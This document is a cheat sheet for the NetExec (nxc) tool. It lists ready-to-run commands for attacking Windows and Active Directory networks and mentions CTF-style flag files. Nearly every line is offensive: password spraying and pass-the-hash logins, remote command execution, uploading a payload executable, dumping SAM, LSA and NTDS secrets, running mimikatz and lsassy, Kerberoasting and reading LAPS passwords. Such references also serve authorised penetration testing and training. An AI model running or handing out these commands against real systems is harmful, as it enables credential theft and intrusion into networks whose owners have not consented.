NetExec (nxc) — the Swiss Army knife for Windows/AD lateral movement, credential spraying, and post-exploitation.
nxc smb 192.168.1.0/24
nxc smb 10.10.10.1 -u user -p password
nxc smb 10.10.10.1 -u user -H NTLMhash
nxc smb 192.168.1.0/24 -u user -p password
nxc smb 10.10.10.1 -u users.txt -p passwords.txt --continue-on-success
nxc smb 10.10.10.1 -u user -p password --shares
nxc smb 10.10.10.1 -u user -p password --sessions
nxc smb 10.10.10.1 -u user -p password --users
nxc smb 10.10.10.1 -u user -p password --groups
nxc smb 10.10.10.1 -u user -p password --pass-pol
nxc smb 10.10.10.1 -u user -p password --rid-brute
nxc smb 10.10.10.1 -u user -p password --loggedon-users
nxc smb 10.10.10.1 -u user -p password --local-auth
nxc smb 10.10.10.1 -u '' -p ''
nxc smb 10.10.10.1 -u user -p password --computers
nxc smb 192.168.1.0/24 -u user -p password --gen-relay-list relay.txt
nxc smb 10.10.10.1 -u user -p password -x "whoami"
nxc smb 10.10.10.1 -u user -p password -X "Get-Process"
nxc winrm 10.10.10.1 -u user -p password -x "whoami"
nxc wmi 10.10.10.1 -u user -p password -x "whoami"
nxc smb 10.10.10.1 -u user -p password -x "whoami" --exec-method smbexec
nxc smb 10.10.10.1 -u user -p password --put-file ./payload.exe 'C:\Windows\Temp\p.exe'
nxc smb 10.10.10.1 -u user -p password --get-file 'C:\Users\Administrator\Desktop\flag.txt' ./flag.txt
nxc smb 10.10.10.1 -u user -p password --sam
nxc smb 10.10.10.1 -u user -p password --lsa
nxc smb 10.10.10.1 -u user -p password --ntds
nxc smb 10.10.10.1 -u user -p password -M mimikatz
nxc smb 10.10.10.1 -u user -p password -M lsassy
nxc smb 10.10.10.1 -u user -p password --dpapi
nxc smb 10.10.10.1 -u user -p password --laps
nxc smb 10.10.10.1 -u admin -p password --ntds drsuapi
nxc smb 10.10.10.1 -u user -p password -M nanodump
nxc smb 10.10.10.1 -u user -p password -M gpp_password
nxc ldap 10.10.10.1 -u user -p password --asreproast asrep.txt
nxc ldap 10.10.10.1 -u user -p password --kerberoasting kerb.txt
nxc ldap 10.10.10.1 -u user -p password --bloodhound -ns 10.10.10.1 -c All
nxc ldap 10.10.10.1 -u user -p password --gmsa
nxc mssql 10.10.10.1 -u sa -p password -q "SELECT @@version"
nxc mssql 10.10.10.1 -u sa -p password --local-auth
nxc ssh 10.10.10.1 -u user -p password -x "id"
nxc rdp 192.168.1.0/24 -u user -p password
nxc ldap 10.10.10.1 -u user -p password -M laps
nxc ldap 10.10.10.1 -u user -p password --trusted-for-delegation
nxc ldap 10.10.10.1 -u user -p password --password-not-required
nxc ldap 10.10.10.1 -u user -p password -M adcs
nxc ldap 10.10.10.1 -u user -p password -M user-desc
nxc winrm 192.168.1.0/24 -u user -p password
nxc smb 10.10.10.1 -u user -p password -M spider_plus
nxc smb 10.10.10.1 -u user -p password --spider C$ --pattern password
nxc smb 10.10.10.1 -u user -p password -M gpp_autologin
nxc smb 10.10.10.1 -u user -p password -M enum_av
nxc ldap 10.10.10.1 -u user -p password -M maq
nxc smb -L